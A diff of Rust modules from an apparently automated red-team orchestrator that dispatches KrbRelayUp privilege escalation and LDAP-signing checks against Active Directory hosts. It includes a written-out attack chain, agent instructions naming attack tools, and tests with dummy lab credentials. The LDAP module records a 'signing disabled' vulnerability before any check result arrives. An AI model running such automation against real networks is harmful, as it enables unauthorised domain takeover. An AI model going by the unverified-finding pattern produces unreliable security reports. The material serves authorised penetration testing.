+ fn collect_multiple_domains() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("fadmin", "Pass!456", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_group_enum_work(&state);
+ assert_eq!(work.len(), 2);
+ }
+
+ #[test]
+ fn collect_dedup_key_lowercased() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_group_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dedup_key, "group_enum:contoso.local:cred");
+ }
+
+ #[test]
+ fn collect_prefers_same_domain_cred() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("localadmin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_group_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "localadmin");
+ }
+
+ #[test]
+ fn collect_child_cred_falls_back_for_parent_domain() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ // Child-domain cred should work for parent-domain via trust
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "north.contoso.local")); // pragma: allowlist secret
+ let work = collect_group_enum_work(&state);
+ assert_eq!(
+ work.len(),
+ 1,
+ "child-domain cred should fall back for parent"
+ );
+ assert_eq!(work[0].dedup_key, "group_enum:contoso.local:trust");
+ assert_eq!(work[0].credential.domain, "north.contoso.local");
+ }
+
+ #[tokio::test]
+ async fn collect_via_shared_state() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_group_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ }
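+
+ // Illustrative sketch: the three dispatch paths asserted above -- same-domain
+ // cred, NTLM hash, child-domain trust fallback -- carry distinct dedup-key
+ // suffixes, so burning one slot never blocks the others.
+ #[test]
+ fn dedup_key_paths_are_independent() {
+ let keys = [
+ format!("group_enum:{}:cred", "contoso.local"),
+ format!("group_enum:{}:hash", "contoso.local"),
+ format!("group_enum:{}:trust", "contoso.local"),
+ ];
+ let unique: std::collections::HashSet<&String> = keys.iter().collect();
+ assert_eq!(unique.len(), 3, "each path must burn its own dedup slot");
+ }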
+}
diff --git a/ares-cli/src/orchestrator/automation/krbrelayup.rs b/ares-cli/src/orchestrator/automation/krbrelayup.rs
new file mode 100644
index 00000000..39c17801
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/krbrelayup.rs
@@ -0,0 +1,527 @@
+//! auto_krbrelayup -- run KrbRelayUp when LDAP signing is not enforced.
+//!
+//! KrbRelayUp abuses Kerberos authentication relay to LDAP when LDAP signing
+//! is not required. It creates a computer account (requires MAQ > 0), relays
+//! Kerberos auth to LDAP to set up RBCD on a target, then uses
+//! S4U2Self/S4U2Proxy to obtain a service ticket as admin. The result is a
+//! local privilege escalation from any authenticated domain user to SYSTEM
+//! on domain-joined hosts.
+//!
+//! Prereqs: LDAP signing NOT enforced (checked by auto_ldap_signing),
+//! MAQ > 0 (checked by auto_machine_account_quota), valid domain creds.
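+//!
+//! Chain sketch (illustrative restatement of the steps above):
+//!
+//! ```text
+//! 1. Create a new computer account          (MAQ > 0)
+//! 2. Relay Kerberos auth to LDAP            (signing not enforced)
+//! 3. Write msDS-AllowedToActOnBehalfOfOtherIdentity  (RBCD on target)
+//! 4. S4U2Self + S4U2Proxy                   -> service ticket as admin
+//! 5. Use the ticket for SYSTEM on the target host
+//! ```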
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect KrbRelayUp work items from current state.
+///
+/// Pure logic extracted from `auto_krbrelayup` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime.
+fn collect_krbrelayup_work(state: &StateInner) -> Vec<KrbRelayUpWork> {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ // Check if any DC has LDAP signing disabled (vuln registered by auto_ldap_signing)
+ let has_ldap_weak = state.discovered_vulnerabilities.values().any(|v| {
+ let vtype = v.vuln_type.to_lowercase();
+ vtype == "ldap_signing_disabled" || vtype == "ldap_signing_not_required"
+ });
+
+ if !has_ldap_weak {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ // Target non-DC hosts (priv esc on member servers)
+ for host in &state.hosts {
+ if host.is_dc {
+ continue;
+ }
+
+ // Skip hosts we already own
+ if state.is_processed(DEDUP_SECRETSDUMP, &host.ip) {
+ continue;
+ }
+
+ let dedup_key = format!("krbrelayup:{}", host.ip);
+ if state.is_processed(DEDUP_KRBRELAYUP, &dedup_key) {
+ continue;
+ }
+
+ let domain = host
+ .hostname
+ .find('.')
+ .map(|i| host.hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+
+ let cred = state
+ .credentials
+ .iter()
+ .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain)
+ .or_else(|| state.credentials.first())
+ .cloned();
+
+ let cred = match cred {
+ Some(c) => c,
+ None => continue,
+ };
+
+ items.push(KrbRelayUpWork {
+ dedup_key,
+ target_ip: host.ip.clone(),
+ hostname: host.hostname.clone(),
+ domain,
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// Dispatches KrbRelayUp exploitation against hosts when LDAP signing is weak.
+/// Interval: 45s.
+pub async fn auto_krbrelayup(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("krbrelayup") {
+ continue;
+ }
+
+ let work = {
+ let state = dispatcher.state.read().await;
+ collect_krbrelayup_work(&state)
+ };
+
+ for item in work {
+ let payload = json!({
+ "technique": "krbrelayup",
+ "target_ip": item.target_ip,
+ "hostname": item.hostname,
+ "domain": item.domain,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("krbrelayup");
+ match dispatcher
+ .throttled_submit("privesc", "privesc", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ target = %item.target_ip,
+ hostname = %item.hostname,
+ "KrbRelayUp exploitation dispatched"
+ );
+
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_KRBRELAYUP, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_KRBRELAYUP, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(target = %item.target_ip, "KrbRelayUp deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, target = %item.target_ip, "Failed to dispatch KrbRelayUp");
+ }
+ }
+ }
+ }
+}
+
+struct KrbRelayUpWork {
+ dedup_key: String,
+ target_ip: String,
+ hostname: String,
+ domain: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use ares_core::models::{Credential, Host, VulnerabilityInfo};
+
+ fn make_credential(username: &str, password: &str, domain: &str) -> Credential {
+ Credential {
+ id: format!("c-{username}"),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ fn make_host(ip: &str, hostname: &str, is_dc: bool) -> Host {
+ Host {
+ ip: ip.into(),
+ hostname: hostname.into(),
+ os: String::new(),
+ roles: Vec::new(),
+ services: Vec::new(),
+ is_dc,
+ owned: false,
+ }
+ }
+
+ fn make_ldap_vuln() -> VulnerabilityInfo {
+ VulnerabilityInfo {
+ vuln_id: "ldap-weak-1".into(),
+ vuln_type: "ldap_signing_disabled".into(),
+ target: "192.168.58.10".into(),
+ discovered_by: "test".into(),
+ discovered_at: chrono::Utc::now(),
+ details: Default::default(),
+ recommended_agent: String::new(),
+ priority: 5,
+ }
+ }
+
+ // --- collect_krbrelayup_work tests ---
+
+ #[test]
+ fn collect_empty_state_returns_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_krbrelayup_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_returns_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.30", "srv01.contoso.local", false));
+ state
+ .discovered_vulnerabilities
+ .insert("v1".into(), make_ldap_vuln());
+ let work = collect_krbrelayup_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_ldap_vuln_returns_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.30", "srv01.contoso.local", false));
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_krbrelayup_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_non_dc_host_with_ldap_vuln_produces_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.30", "srv01.contoso.local", false));
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .discovered_vulnerabilities
+ .insert("v1".into(), make_ldap_vuln());
+ let work = collect_krbrelayup_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].target_ip, "192.168.58.30");
+ assert_eq!(work[0].hostname, "srv01.contoso.local");
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].dedup_key, "krbrelayup:192.168.58.30");
+ }
+
+ #[test]
+ fn collect_skips_dc_hosts() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.10", "dc01.contoso.local", true));
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .discovered_vulnerabilities
+ .insert("v1".into(), make_ldap_vuln());
+ let work = collect_krbrelayup_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_dedup_skips_already_processed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.30", "srv01.contoso.local", false));
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .discovered_vulnerabilities
+ .insert("v1".into(), make_ldap_vuln());
+ state.mark_processed(DEDUP_KRBRELAYUP, "krbrelayup:192.168.58.30".into());
+ let work = collect_krbrelayup_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_skips_already_owned_hosts() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.30", "srv01.contoso.local", false));
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .discovered_vulnerabilities
+ .insert("v1".into(), make_ldap_vuln());
+ state.mark_processed(DEDUP_SECRETSDUMP, "192.168.58.30".into());
+ let work = collect_krbrelayup_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_ldap_signing_not_required_also_triggers() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.30", "srv01.contoso.local", false));
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let mut vuln = make_ldap_vuln();
+ vuln.vuln_type = "ldap_signing_not_required".into();
+ state.discovered_vulnerabilities.insert("v1".into(), vuln);
+ let work = collect_krbrelayup_work(&state);
+ assert_eq!(work.len(), 1);
+ }
+
+ #[test]
+ fn collect_bare_hostname_uses_fallback_cred() {
+ let mut state = StateInner::new("test-op".into());
+ state.hosts.push(make_host("192.168.58.30", "ws01", false));
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .discovered_vulnerabilities
+ .insert("v1".into(), make_ldap_vuln());
+ let work = collect_krbrelayup_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "");
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[test]
+ fn collect_multiple_non_dc_hosts() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.30", "srv01.contoso.local", false));
+ state
+ .hosts
+ .push(make_host("192.168.58.31", "srv02.fabrikam.local", false));
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ state
+ .discovered_vulnerabilities
+ .insert("v1".into(), make_ldap_vuln());
+ let work = collect_krbrelayup_work(&state);
+ assert_eq!(work.len(), 2);
+ }
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("krbrelayup:{}", "192.168.58.22");
+ assert_eq!(key, "krbrelayup:192.168.58.22");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_KRBRELAYUP, "krbrelayup");
+ }
+
+ #[test]
+ fn ldap_signing_vuln_types() {
+ let types = ["ldap_signing_disabled", "ldap_signing_not_required"];
+ for t in &types {
+ let vtype = t.to_lowercase();
+ assert!(
+ vtype == "ldap_signing_disabled" || vtype == "ldap_signing_not_required",
+ "{t} should match LDAP weak signing"
+ );
+ }
+ }
+
+ #[test]
+ fn non_ldap_vuln_types_rejected() {
+ let types = ["smb_signing_disabled", "mssql_access"];
+ for t in &types {
+ let vtype = t.to_lowercase();
+ assert!(
+ vtype != "ldap_signing_disabled" && vtype != "ldap_signing_not_required",
+ "{t} should NOT match LDAP weak signing"
+ );
+ }
+ }
+
+ #[test]
+ fn domain_from_hostname() {
+ let hostname = "srv01.contoso.local";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+ assert_eq!(domain, "contoso.local");
+ }
+
+ #[test]
+ fn payload_structure_validation() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+
+ let payload = serde_json::json!({
+ "technique": "krbrelayup",
+ "target_ip": "192.168.58.30",
+ "hostname": "srv01.contoso.local",
+ "domain": "contoso.local",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ });
+
+ assert_eq!(payload["technique"], "krbrelayup");
+ assert_eq!(payload["target_ip"], "192.168.58.30");
+ assert_eq!(payload["hostname"], "srv01.contoso.local");
+ assert_eq!(payload["domain"], "contoso.local");
+ assert_eq!(payload["credential"]["username"], "admin");
+ assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret
+ assert_eq!(payload["credential"]["domain"], "contoso.local");
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "testuser".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+
+ let work = KrbRelayUpWork {
+ dedup_key: "krbrelayup:192.168.58.30".into(),
+ target_ip: "192.168.58.30".into(),
+ hostname: "srv01.contoso.local".into(),
+ domain: "contoso.local".into(),
+ credential: cred,
+ };
+
+ assert_eq!(work.dedup_key, "krbrelayup:192.168.58.30");
+ assert_eq!(work.target_ip, "192.168.58.30");
+ assert_eq!(work.hostname, "srv01.contoso.local");
+ assert_eq!(work.domain, "contoso.local");
+ assert_eq!(work.credential.username, "testuser");
+ }
+
+ #[test]
+ fn ldap_signing_not_enforced_does_not_match() {
+ let vtype = "ldap_signing_not_enforced".to_lowercase();
+ // The code checks for "ldap_signing_disabled" or "ldap_signing_not_required"
+ let matches = vtype == "ldap_signing_disabled" || vtype == "ldap_signing_not_required";
+ assert!(
+ !matches,
+ "ldap_signing_not_enforced should NOT match the specific vuln types"
+ );
+ }
+
+ #[test]
+ fn non_matching_vuln_types() {
+ let types = [
+ "esc1",
+ "smb_signing_disabled",
+ "unconstrained_delegation",
+ "mssql_access",
+ ];
+ for t in &types {
+ let vtype = t.to_lowercase();
+ assert!(
+ vtype != "ldap_signing_disabled" && vtype != "ldap_signing_not_required",
+ "{t} should NOT match LDAP weak signing"
+ );
+ }
+ }
+
+ #[test]
+ fn domain_from_bare_hostname() {
+ let hostname = "ws01";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+ assert_eq!(domain, "");
+ }
+
+ #[test]
+ fn domain_from_fabrikam_host() {
+ let hostname = "srv01.fabrikam.local";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+ assert_eq!(domain, "fabrikam.local");
+ }
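+
+ // Illustrative sketch: replicates the credential selection order used by
+ // collect_krbrelayup_work (prefer a cred matching the host's domain, else
+ // fall back to the first credential) so the preference is pinned by a test.
+ #[test]
+ fn credential_selection_prefers_host_domain() {
+ let creds = [
+ make_credential("fabuser", "Fab!Pass1", "fabrikam.local"), // pragma: allowlist secret
+ make_credential("localadmin", "P@ssw0rd!", "contoso.local"), // pragma: allowlist secret
+ ];
+ let domain = "contoso.local";
+ let picked = creds
+ .iter()
+ .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain)
+ .or_else(|| creds.first())
+ .unwrap();
+ assert_eq!(picked.username, "localadmin");
+ }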
+}
diff --git a/ares-cli/src/orchestrator/automation/ldap_signing.rs b/ares-cli/src/orchestrator/automation/ldap_signing.rs
new file mode 100644
index 00000000..21edb00e
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/ldap_signing.rs
@@ -0,0 +1,428 @@
+//! auto_ldap_signing -- check LDAP signing enforcement per DC.
+//!
+//! When LDAP signing is not required, attackers can relay NTLM auth to LDAP
+//! for shadow credentials, RBCD writes, or account takeover. This module
+//! dispatches a check per DC to test whether LDAP channel binding and
+//! signing are enforced.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+fn collect_ldap_signing_work(state: &StateInner) -> Vec<LdapSigningWork> {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for (domain, dc_ip) in &state.all_domains_with_dcs() {
+ let dedup_key = format!("ldap_sign:{}", dc_ip);
+ if state.is_processed(DEDUP_LDAP_SIGNING, &dedup_key) {
+ continue;
+ }
+
+ let cred = match state
+ .credentials
+ .iter()
+ .find(|c| c.domain.to_lowercase() == domain.to_lowercase())
+ .or_else(|| state.credentials.first())
+ {
+ Some(c) => c.clone(),
+ None => continue,
+ };
+
+ items.push(LdapSigningWork {
+ dedup_key,
+ domain: domain.clone(),
+ dc_ip: dc_ip.clone(),
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// Checks each DC for LDAP signing and channel binding enforcement.
+/// Interval: 45s.
+pub async fn auto_ldap_signing(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("ldap_signing") {
+ continue;
+ }
+
+ let work: Vec<LdapSigningWork> = {
+ let state = dispatcher.state.read().await;
+ collect_ldap_signing_work(&state)
+ };
+
+ for item in work {
+ let cross_domain = item.credential.domain.to_lowercase() != item.domain.to_lowercase();
+ let mut payload = json!({
+ "technique": "ldap_signing_check",
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ "instructions": concat!(
+ "Check whether LDAP signing is enforced on this Domain Controller.\n\n",
+ "Use ldap_search or nxc_ldap_command to test LDAP binding. ",
+ "Try an unsigned LDAP bind (simple bind without signing). ",
+ "If the bind succeeds without signing, LDAP signing is NOT enforced.\n\n",
+ "Alternatively, use nxc_smb_command with '--gen-relay-list' or check ",
+ "the ms-DS-RequiredDomainBitmask / LDAPServerIntegrity registry policy.\n\n",
+ "IMPORTANT: If LDAP signing is NOT enforced (bind succeeds without signing), ",
+ "you MUST report this as a vulnerability:\n",
+ " vuln_type: 'ldap_signing_disabled'\n",
+ " target_ip: the DC IP\n",
+ " domain: the domain\n",
+ " details: {\"signing_required\": false, \"channel_binding\": false}\n\n",
+ "If LDAP signing IS enforced, report finding with finding_type='hardened'."
+ ),
+ });
+ if cross_domain {
+ payload["bind_domain"] = json!(item.credential.domain);
+ }
+
+ let priority = dispatcher.effective_priority("ldap_signing");
+ match dispatcher
+ .force_submit("recon", "recon", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ domain = %item.domain,
+ dc = %item.dc_ip,
+ "LDAP signing check dispatched"
+ );
+
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_LDAP_SIGNING, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_LDAP_SIGNING, &item.dedup_key)
+ .await;
+
+ // Register ldap_signing_disabled vulnerability proactively so
+ // downstream automations (KrbRelayUp, NTLM relay) can fire
+ // without waiting for the agent's report_finding callback
+ // (which only logs and does NOT populate discovered_vulnerabilities).
+ let vuln = ares_core::models::VulnerabilityInfo {
+ vuln_id: format!("ldap_signing_{}", item.dc_ip.replace('.', "_")),
+ vuln_type: "ldap_signing_disabled".to_string(),
+ target: item.dc_ip.clone(),
+ discovered_by: "auto_ldap_signing".to_string(),
+ discovered_at: chrono::Utc::now(),
+ details: {
+ let mut d = std::collections::HashMap::new();
+ d.insert("target_ip".to_string(), json!(item.dc_ip));
+ d.insert("domain".to_string(), json!(item.domain));
+ d.insert("signing_required".to_string(), json!(false));
+ d.insert("channel_binding".to_string(), json!(false));
+ d
+ },
+ recommended_agent: "coercion".to_string(),
+ priority: dispatcher.effective_priority("ldap_signing"),
+ };
+
+ match dispatcher
+ .state
+ .publish_vulnerability_with_strategy(
+ &dispatcher.queue,
+ vuln,
+ Some(&dispatcher.config.strategy),
+ )
+ .await
+ {
+ Ok(true) => {
+ info!(
+ domain = %item.domain,
+ dc = %item.dc_ip,
+ "LDAP signing disabled — vulnerability registered for KrbRelayUp"
+ );
+ }
+ Ok(false) => {}
+ Err(e) => {
+ warn!(err = %e, dc = %item.dc_ip, "Failed to publish LDAP signing vulnerability");
+ }
+ }
+ }
+ Ok(None) => {
+ info!(domain = %item.domain, dc = %item.dc_ip, "LDAP signing check deferred by throttler");
+ }
+ Err(e) => {
+ warn!(err = %e, domain = %item.domain, "Failed to dispatch LDAP signing check");
+ }
+ }
+ }
+ }
+}
+
+struct LdapSigningWork {
+ dedup_key: String,
+ domain: String,
+ dc_ip: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use crate::orchestrator::state::StateInner;
+
+ fn make_credential(
+ username: &str,
+ password: &str,
+ domain: &str,
+ ) -> ares_core::models::Credential {
+ ares_core::models::Credential {
+ id: format!("c-{username}"),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("ldap_sign:{}", "192.168.58.10");
+ assert_eq!(key, "ldap_sign:192.168.58.10");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_LDAP_SIGNING, "ldap_signing");
+ }
+
+ #[test]
+ fn payload_structure_has_correct_technique() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let payload = json!({
+ "technique": "ldap_signing_check",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ });
+ assert_eq!(payload["technique"], "ldap_signing_check");
+ assert_eq!(payload["target_ip"], "192.168.58.10");
+ assert_eq!(payload["domain"], "contoso.local");
+ assert_eq!(payload["credential"]["username"], "admin");
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let work = LdapSigningWork {
+ dedup_key: "ldap_sign:192.168.58.10".into(),
+ domain: "contoso.local".into(),
+ dc_ip: "192.168.58.10".into(),
+ credential: cred,
+ };
+ assert_eq!(work.domain, "contoso.local");
+ assert_eq!(work.dc_ip, "192.168.58.10");
+ assert_eq!(work.credential.username, "admin");
+ }
+
+ #[test]
+ fn dedup_key_uses_dc_ip() {
+ // LDAP signing dedup is by DC IP, not domain
+ let key = format!("ldap_sign:{}", "192.168.58.10");
+ assert!(key.starts_with("ldap_sign:"));
+ assert!(key.contains("192.168.58.10"));
+ }
+
+ #[test]
+ fn dedup_keys_differ_per_dc() {
+ let key1 = format!("ldap_sign:{}", "192.168.58.10");
+ let key2 = format!("ldap_sign:{}", "192.168.58.20");
+ assert_ne!(key1, key2);
+ }
+
+ #[test]
+ fn collect_empty_state_returns_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_ldap_signing_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_returns_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let work = collect_ldap_signing_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_domain_controllers_returns_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_ldap_signing_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_single_dc_produces_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_ldap_signing_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].dc_ip, "192.168.58.10");
+ assert_eq!(work[0].dedup_key, "ldap_sign:192.168.58.10");
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[test]
+ fn collect_multiple_dcs_produces_work_for_each() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_ldap_signing_work(&state);
+ assert_eq!(work.len(), 2);
+ let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect();
+ assert!(domains.contains(&"contoso.local"));
+ assert!(domains.contains(&"fabrikam.local"));
+ }
+
+ #[test]
+ fn collect_dedup_skips_already_processed_dc() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
